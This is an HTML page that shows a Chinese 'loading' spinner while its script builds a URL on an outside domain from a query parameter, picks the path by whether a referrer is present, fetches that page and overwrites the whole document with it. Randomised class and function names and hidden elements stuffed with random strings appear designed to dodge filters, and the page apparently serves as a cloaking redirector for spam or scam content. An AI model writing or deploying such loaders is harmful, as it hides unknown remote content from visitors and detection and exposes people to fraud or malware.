<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .qsxGrn {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .qsxGrn .UhNiDQ4 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .qsxGrn .content {
            line-height: 50px;
            text-align: center
        }

        .qsxGrn .img {
            width: 100%
        }

        .qsxGrn .VJXg1N85x {
            text-align: center
        }

        .qsxGrn .VJXg1N85x span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .qsxGrn .VJXg1N85x span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .qsxGrn .VJXg1N85x span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .qsxGrn .VJXg1N85x span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .qsxGrn .VJXg1N85x span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .qsxGrn .VJXg1N85x span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .qsxGrn .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FgqOuVQ9w(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var D2xaB99 = FgqOuVQ9w('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ D2xaB99 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ D2xaB99 +".html?a=share";
		}
		
        twtMd3iT=url+"#"+new Date().getTime();
        twtMd3iT && function() {
            $.get(twtMd3iT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>E6QvqCvrlrrISMUNhxKEdjw2TIWlhDy1JZOq44aOjxCPyPdveGLjYFJc3WkkYU9</span>
<b style='display:none' >erJ4mYWNSiNgXvSPh1xDf8FxZr9Eq62Cmgs2efdxHYc5F</b>
<div style='display:none'>OTQvoUqcPB74</div><div class="qsxGrn">
    <div class="UhNiDQ4">
        <div class="VJXg1N85x">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >yrHsKr3XOKc759Ak5DrltWDljEFPh46UMUELBjqgqwGo1vx67nDqGIiZiKThVXYRRc6iaTRIJ1yrt7Ls1</li>
<b style='display:none' >PTJpJ3ECGmwkNQygvjw3NWcdeYtX8i5kjJNdYAbMD8f</b>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>FVsKc18QOZbfDzqqNZjnsD7qgq7zt</a>
<a  href='#' style='display:none'>FVsKc18QOZbfDzqqNZjnsD7qgq7zt</a>
<p  style='display:none'>StUz8kR2FYiWvdR0DMoys8oLI1mtMytUDiTfzssa0As2PEuZdV1aFiB2sA83jQb9zpxB7c4YOi80Qs</p>
<a  href='#' style='display:none'>FVsKc18QOZbfDzqqNZjnsD7qgq7zt</a>
<li style='display:none' >yrHsKr3XOKc759Ak5DrltWDljEFPh46UMUELBjqgqwGo1vx67nDqGIiZiKThVXYRRc6iaTRIJ1yrt7Ls1</li>
<b style='display:none' >PTJpJ3ECGmwkNQygvjw3NWcdeYtX8i5kjJNdYAbMD8f</b></body>
</html>